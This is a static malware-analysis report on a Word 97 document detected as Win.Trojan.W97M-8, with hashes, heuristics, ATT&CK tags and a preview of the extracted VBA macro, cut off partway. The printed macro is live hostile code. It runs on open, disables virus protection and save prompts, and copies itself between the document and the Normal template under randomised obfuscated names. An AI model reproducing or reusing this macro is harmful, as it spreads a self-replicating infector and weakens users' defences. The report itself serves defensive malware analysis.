Win.Trojan.W97M-8 — Office (OLE) malware analysis

Static analysis result for SHA-256 9b46a5e04d9a3bff…

MALICIOUS

Office (OLE)

36.5 KB Created: 1998-12-04 05:36:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: b1f77edb488dfa36d9873f77a7ab0a7a SHA-1: 1cf7b5ec600c0bd0f65e3c8b3fa12bbed787ef81 SHA-256: 9b46a5e04d9a3bffdab89955eb35d61cbc8742983382bfb208de136a5a0122cb
120 Risk Score

Malware Insights

Win.Trojan.W97M-8 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing a malicious VBA macro. The 'Document_Open' macro is designed to execute automatically when the document is opened. The macro attempts to disable virus protection and macro security settings, indicating an intent to download and execute a secondary payload. The ClamAV detection name 'Win.Trojan.W97M-8' further supports its classification as a trojan downloader.

Heuristics 3

  • ClamAV: Win.Trojan.W97M-8 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.W97M-8
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 38371 bytes
SHA-256: 2e19c6210b9d5cb16b1031250ca22d99a19330406a557d045d56253873f9898a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
ŒžØä×»‹à÷Í­âöÆ¿àªõ�Ñé«úí = "176èÖ –¤�«ä¬‹È·ÚŸÜÄ�"
�ñÄâ®òÙÉÐ¥øªÑ›ŸÁ𙫈ӡ¡… = "ã™èƶÀªœèÚð¬åÓñ¢ñÇ¡Ýõ’�ͱ°…㲧"
�ñÄâ®òÙƨåڥâԺœï  = "´˜Ä¶ŸÂõ§ö¢ïç"
ðóˆ·ñ = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
‡êžÃ¨¢«¬¨í­„ºº²Üó¤  ó = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
Application.Options.VirusProtection = False
Application.EnableCancelKey = wdCancelDisabled
WordBasic.DisableAutoMacros 0
Options.SaveNormalPrompt = False
If ðóˆ·ñ > 169 And ‡êžÃ¨¢«¬¨í­„ºº²Üó¤  ó > 169 Then Exit Sub
If ‡êžÃ¨¢«¬¨í­„ºº²Üó¤  ó > 169 Then
Set ò¬ê¼±°ö = ActiveDocument
Set Åâ´Û îǪÈåÛÀªœèÚð¬åÓñ¢ñÇ¡Ž»¥¸ƒÎ×°ÀªœèÚð¬åÓñ¢ñÇ¡½ëÇ¨Ã¦ï“ = NormalTemplate
GoTo •ÀªœèÚð¬åÓñ¢ñǡʨĠÖÌÓÙ£¡µˆ­ÁÀÒ駒렱å
End If
If ‡êžÃ¨¢«¬¨í­„ºº²Üó¤  ó < 170 Then
Set ò¬ê¼±°ö = NormalTemplate
Set Åâ´Û îǪÈåÛÀªœèÚð¬åÓñ¢ñÇ¡Ž»¥¸ƒÎ×°ÀªœèÚð¬åÓñ¢ñÇ¡½ëÇ¨Ã¦ï“ = ActiveDocument
End If
ReDim ¿¾‰¥Ëڻߤò憯™«ªÆÏьƪªéµÓ(50, 50)
“¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ = Åâ´Û îǪÈåÛÀªœèÚð¬åÓñ¢ñÇ¡Ž»¥¸ƒÎ×°ÀªœèÚð¬åÓñ¢ñÇ¡½ëǨæï“.VBProject.VBComponents(1).CodeModule.CountOfLines
ðóˆ·ñ = 0
Do Until ðóˆ·ñ = “¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ
ðóˆ·ñ = ðóˆ·ñ + 1
“дÑëÛƒ­´ï‚‚ŒôŒ½Î = Åâ´Û îǪÈåÛÀªœèÚð¬åÓñ¢ñÇ¡Ž»¥¸ƒÎ×°ÀªœèÚð¬åÓñ¢ñÇ¡½ëǨæï“.VBProject.VBComponents(1).CodeModule.Lines(ðóˆ·ñ, 1)
If Left(“дÑëÛƒ­´ï‚‚ŒôŒ½Î, 1) = "'" Then
™ï = Len(“дÑëÛƒ­´ï‚‚ŒôŒ½Î)
“дÑëÛƒ­´ï‚‚ŒôŒ½Î = Mid(“дÑëÛƒ­´ï‚‚ŒôŒ½Î, 2, ™ï)
“дÑëÛƒ­´ï‚‚ŒôŒ½Î = ""
ÖÙ󕴓дÑëÛƒ­´ï‚‚ŒôŒ½ÎÕ“�ê“дÑëÛƒ­´ï‚‚ŒôŒ½ÎõÒ‹êïܪ¤† = Len(“дÑëÛƒ­´ï‚‚ŒôŒ½Î)
Randomize Timer
Ò–¹ˆßîö¾òÏ—˜¢È­�Žƒ§×¡ÑµÎÀªœèÚð¬åÓñ¢ñÇ¡ÐØ�‡£®×ÂŽ½Éס´²:
ëÕ = CInt(Rnd * 30) + 1
For ÖÙó•´šÕ“�êŠõÒ‹êïܪ¤† = 1 To ëÕ
'‡êžÃ¨¢«¬¨í­„ºº²Üó¤  ó
'ò¬ê¼±°ö
'Åâ´Û îǪÈåÛÀªœèÚð¬åÓñ¢ñÇ¡Ž»¥¸ƒÎ×°ÀªœèÚð¬åÓñ¢ñÇ¡½ëǨæï“
'¥‚ž‡ž˜·¨ÆˆÞ„
'ï׶ì‡
'±—¯„„±Ñ­ÛòÚÕ
'¦âçœÁƒÕ†�ÜÓ‚ñ¢‚
'ðóˆ·ñ
'ÀªœèÚð¬åÓñ¢ñÇ¡
'Ü©ÛÄâò‚ݢŠ¼«™í„
'­œÞ«Ë ·ùœ
'™ï
'�ž�³�½œ¤Ý£¬‘µ¨æô“»Éî¹
'­°è½
'“дÑëÛƒ­´ï‚‚ŒôŒ½Î
'Ò–¹ˆßîö¾òÏ—˜¢È­�Žƒ§×¡ÑµÎÀªœèÚð¬åÓñ¢ñÇ¡ÐØ�‡£®×ÂŽ½Éס´²
'Ó·›‚¼ÏàúÈÏÎâ—Õت«™ÝÂãÃËÄ
'“¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ
'Ü¿ÀªœèÚð¬åÓñ¢ñÇ¡Ï‘Ô´˜ð
'ÖÙ󕴓дÑëÛƒ­´ï‚‚ŒôŒ½ÎÕ“�ê“дÑëÛƒ­´ï‚‚ŒôŒ½ÎõÒ‹êïܪ¤†
'“дÑëÛƒ­´ï‚‚ŒôŒ½Î
'ÆŒ ƒ¥Ï§ÚÊ®ÆùÊ­”ôÄá™°ÄñÄÀªœèÚð¬åÓñ¢ñÇ¡
'׆ò玱éç¾´·³ŸËä¹õ¿Ð‹�ˆ°¹ÀªœèÚð¬åÓñ¢ñÇ¡Û
'“¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ
'Ü¿ÀªœèÚð¬åÓñ¢ñÇ¡Ï‘Ô´˜ð
'™ï
'ÀªœèÚð¬åÓñ¢ñÇ¡
'‚×õùôÇ¥»ô¤…ȉ‚⦽ìÈñµ ÒÖž¹óê
'±—¯„„±Ñ­ÛòÚÕ
'“¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ
'ð¼ŒÞÜÄøÞ†¦
'ÖÙó•´šÕ“�êŠõÒ‹êïܪ¤†
'Ü©ÛÄâò‚ݢŠ¼«™í„
'‚×õùôÇ¥»ô¤…ȉ‚⦽ìÈñµ ÒÖž¹óê
'Ó·›‚¼ÏàúÈÏÎâ—Õت«™ÝÂãÃËÄ
'“¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ
'ª£¨§©ôä«ÀªœèÚð¬åÓñ¢ñÇ¡Êøæû±™ð×ïÉŒû£»�
'õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–ÀªœèÚð¬åÓñ¢ñÇ¡
'“дÑëÛƒ­´ï‚‚ŒôŒ½Î
'–‚† Úµäêî­Í¶Æ¶À÷¤ƒª¯‰
'ëÕ
'ÖÙó•´šÕ“�êŠõÒ‹êïܪ¤†
'¿¾‰¥Ëڻߤò憯™«ªÆÏьƪªéµÓ
'¹ˆßîö¾òÏ—˜¢È­�Žƒ§×
'ðóˆ·ñ
'“¬ì²Ýô¿¶ø¤‹•ç¤²‡³ßÕäÙÈ
' ÄÍ™Ž“�ö·´¨˜©
'•ÀªœèÚð¬åÓñ¢ñǡʨĠÖÌÓÙ£¡µˆ­ÁÀÒ駒렱å
'�ñÄâ®òÙ
õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–ÀªœèÚð¬åÓñ¢ñÇ¡:
 ÄÍ™Ž“�ö·´¨˜© = CInt(Rnd * 250) + 1
If  ÄÍ™Ž“�ö·´¨˜© = 13 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–ÀªœèÚð¬åÓñ¢ñÇ¡
If  ÄÍ™Ž“�ö·´¨˜© < 65 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–ÀªœèÚð¬åÓñ¢ñÇ¡
If  ÄÍ™Ž“�ö·´¨˜© < 130 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–ÀªœèÚð¬åÓñ¢ñÇ¡
“дÑëÛƒ­´ï‚‚ŒôŒ½Î = “дÑëÛƒ­´ï‚‚ŒôŒ½Î & Chr( ÄÍ™Ž“�ö·´¨˜©)
Next ÖÙó•´šÕ“�êŠõÒ‹êïܪ¤†
ª£¨§©ôä«ÀªœèÚð¬åÓñ¢ñÇ¡Êøæû±™ð×ïÉŒû£»� = ª£¨§©ôä«ÀªœèÚð¬åÓñ¢ñÇ¡Êøæû±™ð×ïÉŒû£»� + 1
¿¾‰¥Ëڻߤò憯™«ªÆÏьƪªéµÓ(ª£¨§©ôä«ÀªœèÚð¬åÓñ¢ñÇ¡Êøæû±™ð×ïÉŒû£»�, 1) = “дÑëÛƒ­´ï‚‚ŒôŒ½Î
¿¾‰¥Ëڻߤò憯™«ªÆÏьƪªéµÓ(ª£¨§©ôä«ÀªœèÚð¬åÓñ¢ñÇ¡Êøæû±™ð×ïÉŒû£»�, 2) = “дÑëÛƒ­´ï‚‚ŒôŒ½Î
End If
Loop
•ÀªœèÚð¬åÓñ¢ñǡʨĠÖÌÓÙ£¡µˆ­ÁÀÒ駒렱å:
ðóˆ·ñ = 1
‚×õùôÇ¥»ô¤…ȉ‚⦽ìÈñµ ÒÖž¹óê = "Private Sub Document_Open()" & Chr(13)
If ‡êžÃ¨¢«¬¨í­„ºº²Üó¤  ó < 170 Then
ëÕ = CInt(Rnd * 30) + 1
For ÖÙó•´šÕ“�êŠõÒ‹êïܪ¤† = 1 To ëÕ
‚×õùôÇ¥»ô¤…ȉ‚⦽ìÈñµ ÒÖž¹óê:
Ü¿ÀªœèÚð¬åÓñ¢ñÇ¡Ï‘Ô´˜ð = CInt(Rnd * 250)
If Ü¿ÀªœèÚð¬åÓñ¢ñÇ¡Ï‘Ô´˜ð = 13 Then GoTo ‚×õùôÇ¥»ô¤…ȉ‚⦽ìÈñµ ÒÖž¹óê
If Ü¿ÀªœèÚð¬åÓñ¢ñÇ¡Ï‘Ô´˜ð < 65 The
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.